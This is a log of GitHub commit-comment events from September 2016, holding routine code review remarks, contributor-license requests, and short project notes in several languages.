{"id":"4533105539","type":"CommitCommentEvent","actor":{"login":"s-hajir"},"repo":{"name":"s-hajir/Projekt1-PRG"},"payload":{"comment":{"id":18942572,"position":null,"line":null,"path":null,"commit_id":"fda37ee9e1b49bd5d906bc076997bd7b0965d15e","created_at":"2016-09-08T10:20:32Z","updated_at":"2016-09-08T10:20:32Z","body":"gelöscht, da der Plan als Liste dargestellt wird und die einzelnen Tasks als Listen-Elemente"}},"created_at":"2016-09-08T10:20:32Z"}
{"id":"4533110414","type":"CommitCommentEvent","actor":{"login":"mojinet"},"repo":{"name":"CamJr/OpenClassroom"},"payload":{"comment":{"id":18942584,"position":null,"line":null,"path":null,"commit_id":"08f3d9b9a37213389aed5cc99264bc8df82711f5","created_at":"2016-09-08T10:21:33Z","updated_at":"2016-09-08T10:21:33Z","body":"et ton pied de page il a pas de chaussette?"}},"created_at":"2016-09-08T10:21:33Z"}
{"id":"4533111045","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18942586,"position":null,"line":null,"path":null,"commit_id":"73d9e3d301affda644e89eb2368ee2a804dd63d0","created_at":"2016-09-08T10:21:42Z","updated_at":"2016-09-08T10:21:42Z","body":"The following doc(s) have been deployed to the [pdepaulado](https://pdepaulado-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/downgrade-plan](https://pdepaulado-static-docs.pantheonsite.io/docs/downgrade-plan)\n"}},"created_at":"2016-09-08T10:21:42Z"}
{"id":"4533113328","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18942597,"position":null,"line":null,"path":null,"commit_id":"6119fa89e89c7bbb40553ed7183fe4a9e4dc5905","created_at":"2016-09-08T10:22:13Z","updated_at":"2016-09-08T10:22:13Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#aOGOXQubQbyGdMAXHnZLtg"}},"created_at":"2016-09-08T10:22:13Z"}
{"id":"4533114707","type":"CommitCommentEvent","actor":{"login":"VanDalkvist"},"repo":{"name":"angular-learning/project-tracker"},"payload":{"comment":{"id":18942602,"position":26,"line":26,"path":"public/js/ui.router.module.js","commit_id":"b87a64d5fec088ff1db823bf0fa28a8b79065fb3","created_at":"2016-09-08T10:22:29Z","updated_at":"2016-09-08T10:22:29Z","body":"What is the purpose of this redirect?"}},"created_at":"2016-09-08T10:22:29Z"}
{"id":"4533119194","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"ethcore/parity"},"payload":{"comment":{"id":18942608,"position":16,"line":20,"path":"js/src/dapps/registry/reducers.js","commit_id":"14e32517068fdf08bc97e8b138582e55c80b0096","created_at":"2016-09-08T10:23:25Z","updated_at":"2016-09-08T10:23:25Z","body":"@jacogr I don't particularly like this, although using an array for `action.type` feels overengineered."}},"created_at":"2016-09-08T10:23:25Z"}
{"id":"4533120876","type":"CommitCommentEvent","actor":{"login":"da3dsoul"},"repo":{"name":"japanesemediamanager/jmmserver"},"payload":{"comment":{"id":18942613,"position":null,"line":null,"path":null,"commit_id":"a20d6cc0c8800ce83cb4b85bf37a517d04bf5b94","created_at":"2016-09-08T10:23:45Z","updated_at":"2016-09-08T10:23:45Z","body":"@maxpiva I debugged the crap out of this. When Banners and Fanarts are set they go into the PlexContract. When it is saved, the PlexContract has Banners and Fanarts set. When it is retrieved via grp.GetPlexContract(userid), they are not set (they are null). Any idea what I did wrong or didn't do."}},"created_at":"2016-09-08T10:23:45Z"}
{"id":"4533124288","type":"CommitCommentEvent","actor":{"login":"VanDalkvist"},"repo":{"name":"angular-learning/project-tracker"},"payload":{"comment":{"id":18942624,"position":40,"line":40,"path":"public/js/ui.router.module.js","commit_id":"b87a64d5fec088ff1db823bf0fa28a8b79065fb3","created_at":"2016-09-08T10:24:30Z","updated_at":"2016-09-08T10:24:30Z","body":"This is totally useless comments I think :) "}},"created_at":"2016-09-08T10:24:30Z"}
{"id":"4533124637","type":"CommitCommentEvent","actor":{"login":"koujinshidui"},"repo":{"name":"ruanyf/jstutorial"},"payload":{"comment":{"id":18942626,"position":19,"line":457,"path":"grammar/operator.md","commit_id":"ab3ad4cecb67b0165a7ccd3313d6efb292052cd5","created_at":"2016-09-08T10:24:34Z","updated_at":"2016-09-08T10:24:34Z","body":"做为一个初入编程小白，大牛，我好崇拜你哦。^_^，请问下，你是怎么学习前端的呢，可以给点指点吗。😄\n\n发自 网易邮箱大师\n在2016年09月07日 23:13，Ruan YiFeng 写道:\n\n查了一下规格，确实是 ToPrimitive(A) == ToNumber(B)\n\n—\nYou are receiving this because you commented.\nReply to this email directly, view it on GitHub, or mute the thread."}},"created_at":"2016-09-08T10:24:34Z"}
{"id":"4533125423","type":"CommitCommentEvent","actor":{"login":"kgyy"},"repo":{"name":"kgyy/qqbot"},"payload":{"comment":{"id":18942634,"position":null,"line":null,"path":null,"commit_id":"e9ec592a7af3ecf2c7d7d60fbe28a3471e77fb42","created_at":"2016-09-08T10:24:45Z","updated_at":"2016-09-08T10:24:45Z","body":"-ip"}},"created_at":"2016-09-08T10:24:45Z"}
{"id":"4533127941","type":"CommitCommentEvent","actor":{"login":"s-hajir"},"repo":{"name":"s-hajir/Projekt1-PRG"},"payload":{"comment":{"id":18942636,"position":null,"line":null,"path":null,"commit_id":"02507777e176134d1a16dd44e92b1fa34a74503d","created_at":"2016-09-08T10:25:18Z","updated_at":"2016-09-08T10:25:18Z","body":"In den Formularen wurden einige <button> zu  <input> geändert"}},"created_at":"2016-09-08T10:25:18Z"}
{"id":"4533131934","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"ethcore/parity"},"payload":{"comment":{"id":18942651,"position":11,"line":10,"path":"js/src/dapps/registry/reducers.js","commit_id":"14e32517068fdf08bc97e8b138582e55c80b0096","created_at":"2016-09-08T10:26:12Z","updated_at":"2016-09-08T10:26:12Z","body":"@jacogr \r\n\r\nWhat I don't like about this is that *any* reducer is supposed to be able to change its part of the state. Therefore, something like this would be more appropriate:\r\n\r\n```\r\nexport default (state = initialState, action) => ({\r\n  contract: contractReducer(state.contract, action),\r\n  // …\r\n  lookup: lookupReducer(state.lookup, action)\r\n})\r\n```"}},"created_at":"2016-09-08T10:26:12Z"}
{"id":"4533136033","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":18942657,"position":null,"line":null,"path":null,"commit_id":"a2ef5edfb75a82ad91f59b82cf19ccbbdb4045b0","created_at":"2016-09-08T10:27:05Z","updated_at":"2016-09-08T10:27:05Z","body":"Why do you use 30+0.3\r\nIf you have a good reason, then you should also set hash to a higher value(say 16)"}},"created_at":"2016-09-08T10:27:05Z"}
{"id":"4533137532","type":"CommitCommentEvent","actor":{"login":"s-hajir"},"repo":{"name":"s-hajir/Projekt1-PRG"},"payload":{"comment":{"id":18942661,"position":null,"line":null,"path":null,"commit_id":"8cf5f929bcee448a530e0d3b29bee0fa644aa4d2","created_at":"2016-09-08T10:27:26Z","updated_at":"2016-09-08T10:27:26Z","body":"kleine Nachbesserung"}},"created_at":"2016-09-08T10:27:26Z"}
{"id":"4533138436","type":"CommitCommentEvent","actor":{"login":"nicolaasuni"},"repo":{"name":"tecnickcom/tcexam"},"payload":{"comment":{"id":18942664,"position":null,"line":null,"path":null,"commit_id":"6e2e6a5acb812e0bbf5386ef2a64d7167074bf25","created_at":"2016-09-08T10:27:38Z","updated_at":"2016-09-08T10:27:38Z","body":"Hi Wolfgang, would you please sign up the following CLA in order to keep your contribution?\r\nhttps://cla-assistant.io/tecnickcom/tcexam"}},"created_at":"2016-09-08T10:27:38Z"}
{"id":"4533139579","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"ethcore/parity"},"payload":{"comment":{"id":18942666,"position":18,"line":18,"path":"js/src/dapps/registry/Lookup/lookup.js","commit_id":"7527bfa911918c6edf4acc6aac716e58c7e65d63","created_at":"2016-09-08T10:27:52Z","updated_at":"2016-09-08T10:27:52Z","body":"@jacogr Any more elegant solution?"}},"created_at":"2016-09-08T10:27:52Z"}
{"id":"4533144810","type":"CommitCommentEvent","actor":{"login":"VanDalkvist"},"repo":{"name":"angular-learning/project-tracker"},"payload":{"comment":{"id":18942671,"position":54,"line":54,"path":"public/js/ui.router.module.js","commit_id":"b87a64d5fec088ff1db823bf0fa28a8b79065fb3","created_at":"2016-09-08T10:29:02Z","updated_at":"2016-09-08T10:29:02Z","body":"Use absolute paths gor template urls, because when you move configuration somewhere you have broken urls."}},"created_at":"2016-09-08T10:29:02Z"}
{"id":"4533145375","type":"CommitCommentEvent","actor":{"login":"nicolaasuni"},"repo":{"name":"tecnickcom/tc-lib-barcode"},"payload":{"comment":{"id":18942675,"position":null,"line":null,"path":null,"commit_id":"7fc2674525de9d38745499181f739c5b373cacb0","created_at":"2016-09-08T10:29:11Z","updated_at":"2016-09-08T10:29:11Z","body":"Hi Remi,\r\nWould you please sign the following CLA in order to keep your contribution?\r\nhttps://cla-assistant.io/tecnickcom/tc-lib-barcode"}},"created_at":"2016-09-08T10:29:11Z"}
{"id":"4533145586","type":"CommitCommentEvent","actor":{"login":"BigBoot"},"repo":{"name":"TheOfficialFloW/VitaShell"},"payload":{"comment":{"id":18942676,"position":null,"line":null,"path":null,"commit_id":"bf6c200770ed539493b41304ba86f0fe36ea73d1","created_at":"2016-09-08T10:29:14Z","updated_at":"2016-09-08T10:29:14Z","body":"Yes I think a context menu is the way to go. \r\nThen we could move hex editor to context menu and use square to mark lines.\r\n\r\nOther options would be cut/copy/paste and save/close."}},"created_at":"2016-09-08T10:29:14Z"}
{"id":"4533146198","type":"CommitCommentEvent","actor":{"login":"d00p"},"repo":{"name":"Froxlor/Froxlor"},"payload":{"comment":{"id":18942678,"position":null,"line":null,"path":null,"commit_id":"e4887362ec33d6ee191a0df27303ea74de05d54e","created_at":"2016-09-08T10:29:22Z","updated_at":"2016-09-08T10:29:22Z","body":"Can you check whether https://github.com/Froxlor/Froxlor/commit/08f36243e9fe37951eda1990c8f78788e9aca4cf fixes the issues?"}},"created_at":"2016-09-08T10:29:22Z"}
{"id":"4533146576","type":"CommitCommentEvent","actor":{"login":"Irfan08"},"repo":{"name":"Irfan08/hello-world"},"payload":{"comment":{"id":18942681,"position":5,"line":3,"path":"README.md","commit_id":"1c16241c59f7c72547a264be06528ee16e46e5d4","created_at":"2016-09-08T10:29:27Z","updated_at":"2016-09-08T10:29:27Z","body":"this is a repository\r\n"}},"created_at":"2016-09-08T10:29:27Z"}
{"id":"4533147778","type":"CommitCommentEvent","actor":{"login":"nicolaasuni"},"repo":{"name":"tecnickcom/tc-lib-barcode"},"payload":{"comment":{"id":18942685,"position":null,"line":null,"path":null,"commit_id":"6d449513cc2ccf5de4265b7b1f2543aa1a83e916","created_at":"2016-09-08T10:29:44Z","updated_at":"2016-09-08T10:29:44Z","body":"Would you please sign the following CLA in order to keep your contribution?\r\nhttps://cla-assistant.io/tecnickcom/tc-lib-barcode"}},"created_at":"2016-09-08T10:29:44Z"}
{"id":"4533147860","type":"CommitCommentEvent","actor":{"login":"sorbits"},"repo":{"name":"textmate/textmate"},"payload":{"comment":{"id":18942686,"position":null,"line":null,"path":null,"commit_id":"dc0331b781246cf76d0f2dc3b71638d2677fac5d","created_at":"2016-09-08T10:29:44Z","updated_at":"2016-09-08T10:29:44Z","body":"You need to use the initial menu item title which is (now) “Select \nDocument”.\n\nSee http://manual.macromates.com/en/key_bindings#menu_items\n\nOn 8 Sep 2016, at 12:19, Kai Wood wrote:\n\n> A little bit late to the party, but: This change made it impossible to \n> change the shortcut via system settings because of the dynamic title.\n>\n> I had it bound to CMD-Shift-R for a really long time, for consistency \n> reasons (the others are all CMD-Shift-Something) and because I use \n> CTRL-Shift-Something as global shortcuts for launching applications.\n>\n> -- \n> You are receiving this because you authored the thread.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/textmate/textmate/commit/dc0331b781246cf76d0f2dc3b71638d2677fac5d#commitcomment-18942560\n\n\n"}},"created_at":"2016-09-08T10:29:44Z"}
{"id":"4533148525","type":"CommitCommentEvent","actor":{"login":"nicolaasuni"},"repo":{"name":"tecnickcom/tc-lib-barcode"},"payload":{"comment":{"id":18942690,"position":null,"line":null,"path":null,"commit_id":"5a576dff319c6211ddd8d29de51a27a9a40bd12b","created_at":"2016-09-08T10:29:53Z","updated_at":"2016-09-08T10:29:53Z","body":"Would you please sign the following CLA in order to keep your contribution?\r\nhttps://cla-assistant.io/tecnickcom/tc-lib-barcode"}},"created_at":"2016-09-08T10:29:53Z"}
{"id":"4533148732","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"ethcore/parity"},"payload":{"comment":{"id":18942693,"position":46,"line":46,"path":"js/src/dapps/registry/Lookup/lookup.js","commit_id":"7527bfa911918c6edf4acc6aac716e58c7e65d63","created_at":"2016-09-08T10:29:57Z","updated_at":"2016-09-08T10:29:57Z","body":"@jacogr I'd prefer `this.props.result` here, but then I'd have to pass every single prop from the parent component into this one."}},"created_at":"2016-09-08T10:29:57Z"}
{"id":"4533149006","type":"CommitCommentEvent","actor":{"login":"rkorytkowski"},"repo":{"name":"openmrs/openmrs-core"},"payload":{"comment":{"id":18942695,"position":371,"line":1569,"path":"api/src/main/java/org/openmrs/api/impl/PatientServiceImpl.java","commit_id":"d65825b685453515f55e30504e9cd92ebaa3f759","created_at":"2016-09-08T10:30:00Z","updated_at":"2016-09-08T10:30:00Z","body":"@dkayiwa, it appears that this change breaks https://issues.openmrs.org/browse/RA-1194 \r\n\r\nYou omitted identifier and the code in merging patient relies on finding a patient by identifier."}},"created_at":"2016-09-08T10:30:00Z"}
{"id":"4533149024","type":"CommitCommentEvent","actor":{"login":"salkinium"},"repo":{"name":"salkinium/xpcc"},"payload":{"comment":{"id":18942696,"position":68,"line":68,"path":"src/xpcc/architecture/interface/assert.hpp","commit_id":"2fd56738037694722281a5dca0d0480ae16c1549","created_at":"2016-09-08T10:30:01Z","updated_at":"2016-09-08T10:30:01Z","body":"Because loose coupling."}},"created_at":"2016-09-08T10:30:01Z"}
{"id":"4533149031","type":"CommitCommentEvent","actor":{"login":"nicolaasuni"},"repo":{"name":"tecnickcom/tc-lib-barcode"},"payload":{"comment":{"id":18942697,"position":null,"line":null,"path":null,"commit_id":"58c08d9ee7190348c7db5df65bcff8bcf616ba11","created_at":"2016-09-08T10:30:01Z","updated_at":"2016-09-08T10:30:01Z","body":"Would you please sign the following CLA in order to keep your contribution?\r\nhttps://cla-assistant.io/tecnickcom/tc-lib-barcode"}},"created_at":"2016-09-08T10:30:01Z"}
{"id":"4533151197","type":"CommitCommentEvent","actor":{"login":"ivanovvitaly"},"repo":{"name":"driftyco/ionic"},"payload":{"comment":{"id":18942701,"position":null,"line":null,"path":null,"commit_id":"34d663eb7ef7c3bb55d76ef819ce77a864996d27","created_at":"2016-09-08T10:30:28Z","updated_at":"2016-09-08T10:30:28Z","body":"Where is is code? I'm using ionic 1.3.1 and I need this peace of code that is really missing"}},"created_at":"2016-09-08T10:30:28Z"}
{"id":"4533152836","type":"CommitCommentEvent","actor":{"login":"salkinium"},"repo":{"name":"salkinium/xpcc"},"payload":{"comment":{"id":18942704,"position":68,"line":68,"path":"src/xpcc/architecture/interface/assert.hpp","commit_id":"2fd56738037694722281a5dca0d0480ae16c1549","created_at":"2016-09-08T10:30:51Z","updated_at":"2016-09-08T10:30:51Z","body":"We're not going to maintain a central enum like `errno`."}},"created_at":"2016-09-08T10:30:51Z"}
{"id":"4533155707","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18942713,"position":null,"line":null,"path":null,"commit_id":"64aaa5dfb45be05587a88d92f2dddcd610e27cac","created_at":"2016-09-08T10:31:29Z","updated_at":"2016-09-08T10:31:29Z","body":"The `det-sig` dev-branch was renamed to `detsig` after this merge."}},"created_at":"2016-09-08T10:31:29Z"}
{"id":"4533155942","type":"CommitCommentEvent","actor":{"login":"jbaines7276"},"repo":{"name":"jekyll/jekyll-mentions"},"payload":{"comment":{"id":18942715,"position":null,"line":null,"path":null,"commit_id":"851d5a317a776f3fc34dd5cc1153adbd03c3709d","created_at":"2016-09-08T10:31:32Z","updated_at":"2016-09-08T10:31:32Z","body":"What is this"}},"created_at":"2016-09-08T10:31:32Z"}
{"id":"4533156377","type":"CommitCommentEvent","actor":{"login":"pexcn"},"repo":{"name":"shadowsocks/luci-app-shadowsocks"},"payload":{"comment":{"id":18942717,"position":5,"line":28,"path":"Makefile","commit_id":"60ffb457ee2bc1b3c9a4b90a9f8c59847dc75850","created_at":"2016-09-08T10:31:38Z","updated_at":"2016-09-08T10:31:38Z","body":"请问为什么要这么做？ipset 是不是依赖 ip ?"}},"created_at":"2016-09-08T10:31:38Z"}
{"id":"4533158103","type":"CommitCommentEvent","actor":{"login":"nicolaasuni"},"repo":{"name":"tecnickcom/tc-lib-pdf-font"},"payload":{"comment":{"id":18942721,"position":null,"line":null,"path":null,"commit_id":"2f4683efd116d69595c33eefe622bd444e105fdf","created_at":"2016-09-08T10:32:02Z","updated_at":"2016-09-08T10:32:02Z","body":"Would you please sign the following CLA in order to keep your contribution?\r\nhttps://cla-assistant.io/tecnickcom/tc-lib-pdf-font\r\n"}},"created_at":"2016-09-08T10:32:02Z"}
{"id":"4533165761","type":"CommitCommentEvent","actor":{"login":"nicolaasuni"},"repo":{"name":"tecnickcom/tc-lib-pdf"},"payload":{"comment":{"id":18942733,"position":null,"line":null,"path":null,"commit_id":"a846d8fb188263c0723337c43ce9e49c7763fc8a","created_at":"2016-09-08T10:33:47Z","updated_at":"2016-09-08T10:33:47Z","body":"Would you please sign the following CLA in order to keep your contribution?\r\nhttps://cla-assistant.io/tecnickcom/tc-lib-pdf\r\n"}},"created_at":"2016-09-08T10:33:47Z"}
{"id":"4533166819","type":"CommitCommentEvent","actor":{"login":"VanDalkvist"},"repo":{"name":"angular-learning/project-tracker"},"payload":{"comment":{"id":18942736,"position":1,"line":1,"path":"public/js/ui.router.module.js","commit_id":"b87a64d5fec088ff1db823bf0fa28a8b79065fb3","created_at":"2016-09-08T10:34:01Z","updated_at":"2016-09-08T10:34:01Z","body":"Strange name for a module. See Papa's style guide about naming"}},"created_at":"2016-09-08T10:34:01Z"}
{"id":"4533168224","type":"CommitCommentEvent","actor":{"login":"nicolaasuni"},"repo":{"name":"tecnickcom/tc-lib-unicode"},"payload":{"comment":{"id":18942740,"position":null,"line":null,"path":null,"commit_id":"0046639c0e79de40d9f907fe056cdaca48a4c140","created_at":"2016-09-08T10:34:20Z","updated_at":"2016-09-08T10:34:20Z","body":"Would you please sign the following CLA in order to keep your contribution?\r\nhttps://cla-assistant.io/tecnickcom/tc-lib-unicode"}},"created_at":"2016-09-08T10:34:20Z"}
{"id":"4533170823","type":"CommitCommentEvent","actor":{"login":"nicolaasuni"},"repo":{"name":"tecnickcom/tc-lib-unicode-data"},"payload":{"comment":{"id":18942744,"position":null,"line":null,"path":null,"commit_id":"d8a93fe72071dd977f6c33459a063153a668647c","created_at":"2016-09-08T10:34:56Z","updated_at":"2016-09-08T10:34:56Z","body":"Would you please sign the following CLA in order to keep your contribution?\r\nhttps://cla-assistant.io/tecnickcom/tc-lib-unicode-data\r\n"}},"created_at":"2016-09-08T10:34:56Z"}
{"id":"4533171874","type":"CommitCommentEvent","actor":{"login":"mikesteez"},"repo":{"name":"uppsala-university/ladok"},"payload":{"comment":{"id":18942747,"position":null,"line":null,"path":null,"commit_id":"9b4e7cfbeee2fd5ba9b36cc453464df28d4ab933","created_at":"2016-09-08T10:35:13Z","updated_at":"2016-09-08T10:35:13Z","body":"Det är bara Utbildningsinstans som gäller, modul räknas också som en Utbildningsinstans, men skapas som underliggande till t.ex. en kurs. "}},"created_at":"2016-09-08T10:35:13Z"}
{"id":"4533172462","type":"CommitCommentEvent","actor":{"login":"LaconPan"},"repo":{"name":"LaconPan/TestGit"},"payload":{"comment":{"id":18942749,"position":null,"line":null,"path":null,"commit_id":"6963a0ed34c78d82effd5c372265893f63462207","created_at":"2016-09-08T10:35:19Z","updated_at":"2016-09-08T10:35:19Z","body":"how use github?\r\nhow?how?How\r\nAnyone tell me "}},"created_at":"2016-09-08T10:35:19Z"}
{"id":"4533173779","type":"CommitCommentEvent","actor":{"login":"Diandra-Iulia"},"repo":{"name":"Diandra-Iulia/Shop-Online-Project"},"payload":{"comment":{"id":18942751,"position":null,"line":null,"path":null,"commit_id":"97ecdb1edd9c992c047daa7663ed5b65e3e65096","created_at":"2016-09-08T10:35:36Z","updated_at":"2016-09-08T10:35:36Z","body":"This is an online shop application using PHP and HTML 5 and CSS"}},"created_at":"2016-09-08T10:35:36Z"}
{"id":"4533173963","type":"CommitCommentEvent","actor":{"login":"aa65535"},"repo":{"name":"shadowsocks/luci-app-shadowsocks"},"payload":{"comment":{"id":18942752,"position":5,"line":28,"path":"Makefile","commit_id":"60ffb457ee2bc1b3c9a4b90a9f8c59847dc75850","created_at":"2016-09-08T10:35:38Z","updated_at":"2016-09-08T10:35:38Z","body":"@pexcn ipset 和 ip 没关系。"}},"created_at":"2016-09-08T10:35:38Z"}
{"id":"4533174511","type":"CommitCommentEvent","actor":{"login":"U-KT-Joshua"},"repo":{"name":"U-KT-Joshua/test2"},"payload":{"comment":{"id":18942753,"position":null,"line":null,"path":null,"commit_id":"5c980266a417d9379688319bb8a2bc8c74caae25","created_at":"2016-09-08T10:35:45Z","updated_at":"2016-09-08T10:35:45Z","body":"test"}},"created_at":"2016-09-08T10:35:45Z"}
{"id":"4533177851","type":"CommitCommentEvent","actor":{"login":"hvr"},"repo":{"name":"haskell/directory"},"payload":{"comment":{"id":18942758,"position":13,"line":1325,"path":"System/Directory.hs","commit_id":"1ec1ea8e4210d55d8d6e0e5fc8dd543340004b92","created_at":"2016-09-08T10:36:24Z","updated_at":"2016-09-08T10:36:24Z","body":"@Rufflewind fyi, a `@since` annotation is missing... this confused me quite a bit today since I was wondering why GHC 8's directory doesn't export `getFileSize`...."}},"created_at":"2016-09-08T10:36:24Z"}
{"id":"4533178773","type":"CommitCommentEvent","actor":{"login":"db483"},"repo":{"name":"CU-CommunityApps/cu-kfs"},"payload":{"comment":{"id":18942760,"position":104,"line":104,"path":"src/main/java/edu/cornell/kfs/fp/service/impl/RecurringDisbursementVoucherPaymentMaintenanceServiceImpl.java","commit_id":"b366199f3fe9c44d4d7f9a331068879362aa3c40","created_at":"2016-09-08T10:36:35Z","updated_at":"2016-09-08T10:36:35Z","body":"I can't find something different in this method then the one in PaymentMaintenanceServiceImpl. Was there a reason for copying it in and removing \"extends PaymentMaintenanceServiceImpl\"?"}},"created_at":"2016-09-08T10:36:35Z"}
{"id":"4533181049","type":"CommitCommentEvent","actor":{"login":"da3dsoul"},"repo":{"name":"japanesemediamanager/jmmserver"},"payload":{"comment":{"id":18942765,"position":null,"line":null,"path":null,"commit_id":"a20d6cc0c8800ce83cb4b85bf37a517d04bf5b94","created_at":"2016-09-08T10:37:03Z","updated_at":"2016-09-08T10:37:03Z","body":"On the plus side, it returns null really fast"}},"created_at":"2016-09-08T10:37:03Z"}
{"id":"4533181388","type":"CommitCommentEvent","actor":{"login":"wongsyrone"},"repo":{"name":"shadowsocks/luci-app-shadowsocks"},"payload":{"comment":{"id":18942766,"position":5,"line":28,"path":"Makefile","commit_id":"60ffb457ee2bc1b3c9a4b90a9f8c59847dc75850","created_at":"2016-09-08T10:37:08Z","updated_at":"2016-09-08T10:37:08Z","body":"ip 一般是由 iproute2 提供的"}},"created_at":"2016-09-08T10:37:08Z"}
{"id":"4533181971","type":"CommitCommentEvent","actor":{"login":"chilek"},"repo":{"name":"tecnickcom/tc-lib-barcode"},"payload":{"comment":{"id":18942767,"position":null,"line":null,"path":null,"commit_id":"7fc2674525de9d38745499181f739c5b373cacb0","created_at":"2016-09-08T10:37:15Z","updated_at":"2016-09-08T10:37:15Z","body":"does this patch makes tc-lib-barcode closer to be php 5.3 compatible? ;-)"}},"created_at":"2016-09-08T10:37:15Z"}
{"id":"4533184249","type":"CommitCommentEvent","actor":{"login":"nicolaasuni"},"repo":{"name":"tecnickcom/tc-lib-pdf-parser"},"payload":{"comment":{"id":18942771,"position":null,"line":null,"path":null,"commit_id":"8933621df1d2bca67701f24f4325254cf7fccd13","created_at":"2016-09-08T10:37:40Z","updated_at":"2016-09-08T10:37:40Z","body":"Would you please sign the following CLA in order to keep your contribution?\r\nhttps://cla-assistant.io/tecnickcom/tc-lib-pdf-parser\r\n"}},"created_at":"2016-09-08T10:37:40Z"}
{"id":"4533184589","type":"CommitCommentEvent","actor":{"login":"toby-1-kenobi"},"repo":{"name":"udacity/Sunshine-Version-2"},"payload":{"comment":{"id":18942772,"position":null,"line":null,"path":null,"commit_id":"f63ba9f1873f55120696d9a1f9d203f9618daae6","created_at":"2016-09-08T10:37:44Z","updated_at":"2016-09-08T10:37:44Z","body":"I think because the share functionality belongs with the fragment.\nFragments can be reused in many different activities. This way whatever\nactivity you put the details fragment in, it brings it's share action with\nit.\n\nOn Mon, 29 Aug 2016, 04:25 RafayAK, <notifications@github.com> wrote:\n\n> Can anyone explain why the Share Intent was implemented in the Fragment\n> and not the Activity.\n>\n>    1. Creating the share menu item in detail.xml seems more\n>    straightforward as it already exists(i.e no need to create\n>    detailfragment.xml)\n>    2. The string mForecastStr can be set as global variable private\n>    static String mForecastStr; within DetailActivity and be set in the\n>    DetailFragment, as it would be accessible within it too.\n>    3. Since the onCreateOptionsMenu is already created in the Activity we\n>    just need to fill it with appropriate lines just get the share intent\n>    working.\n>\n> What I am trying to say is I got the Share Intent working while making\n> changes in the Activity and its XML, is there a benefit to creating the\n> Share Intent within the Fragement, instead?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/udacity/Sunshine-Version-2/commit/f63ba9f1873f55120696d9a1f9d203f9618daae6#commitcomment-18806206>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAZwPj1CtQsj81JrsMygx9EI-PXS2bPzks5qkdKXgaJpZM4EW90->\n> .\n>\n"}},"created_at":"2016-09-08T10:37:44Z"}
{"id":"4533185570","type":"CommitCommentEvent","actor":{"login":"nicolaasuni"},"repo":{"name":"tecnickcom/tc-lib-pdf-parser"},"payload":{"comment":{"id":18942775,"position":null,"line":null,"path":null,"commit_id":"9f454323b5d21061d07c6ac00a2a9998a0ede9f9","created_at":"2016-09-08T10:37:55Z","updated_at":"2016-09-08T10:37:55Z","body":"Would you please sign the following CLA in order to keep your contribution?\r\nhttps://cla-assistant.io/tecnickcom/tc-lib-pdf-parser"}},"created_at":"2016-09-08T10:37:55Z"}
{"id":"4533186234","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18942776,"position":null,"line":null,"path":null,"commit_id":"57594b3ddb619e61181d0067e4ea7e66211a7e6b","created_at":"2016-09-08T10:38:03Z","updated_at":"2016-09-08T10:38:03Z","body":"Thanks everyone!"}},"created_at":"2016-09-08T10:38:03Z"}
{"id":"4533186674","type":"CommitCommentEvent","actor":{"login":"Wikonator"},"repo":{"name":"Wikonator/Expresso"},"payload":{"comment":{"id":18942778,"position":1,"line":1,"path":"dump.rdb","commit_id":"4afca80e5f9df2a18604852239ef28f6defee18b","created_at":"2016-09-08T10:38:09Z","updated_at":"2016-09-08T10:38:09Z","body":"It was a test for branch merging!\nOn 8 Sep 2016 10:49, \"Julia Friesel\" <notifications@github.com> wrote:\n\n> you probably didn't mean to commit this?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Wikonator/Expresso/commit/4afca80e5f9df2a18604852239ef28f6defee18b#commitcomment-18941511>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ATknNmJhulOeDwnZXhgDdxUYj5bWGM7Gks5qn8wugaJpZM4J3wQe>\n> .\n>\n"}},"created_at":"2016-09-08T10:38:09Z"}
{"id":"4533189165","type":"CommitCommentEvent","actor":{"login":"nicolaasuni"},"repo":{"name":"tecnickcom/tc-lib-pdf-page"},"payload":{"comment":{"id":18942786,"position":null,"line":null,"path":null,"commit_id":"4a24f066670393cbe71b56549a93c7eb6f4f9e27","created_at":"2016-09-08T10:38:36Z","updated_at":"2016-09-08T10:38:36Z","body":"Would you please sign the following CLA in order to keep your contribution?\r\nhttps://cla-assistant.io/tecnickcom/tc-lib-pdf-page"}},"created_at":"2016-09-08T10:38:36Z"}
{"id":"4533189510","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Perkir/tutu"},"payload":{"comment":{"id":18942787,"position":3,"line":3,"path":"app/models/railway_station.rb","commit_id":"f88c1e4833298ea6246c35401cf8dcf288b54e2e","created_at":"2016-09-08T10:38:39Z","updated_at":"2016-09-08T10:38:39Z","body":"У модели не может быть 2 ассоциации с одинаковым именем. Потому что если мы вызовем station.tickets, то как определить, какую конкретно ассоциацию мы хотим вызывать?"}},"created_at":"2016-09-08T10:38:39Z"}
{"id":"4533191289","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Perkir/tutu"},"payload":{"comment":{"id":18942790,"position":2,"line":2,"path":"app/models/railway_station.rb","commit_id":"f88c1e4833298ea6246c35401cf8dcf288b54e2e","created_at":"2016-09-08T10:39:00Z","updated_at":"2016-09-08T10:39:00Z","body":"Имя класс задавать не обязательно, если название ассоциации и класса совпадают"}},"created_at":"2016-09-08T10:39:00Z"}
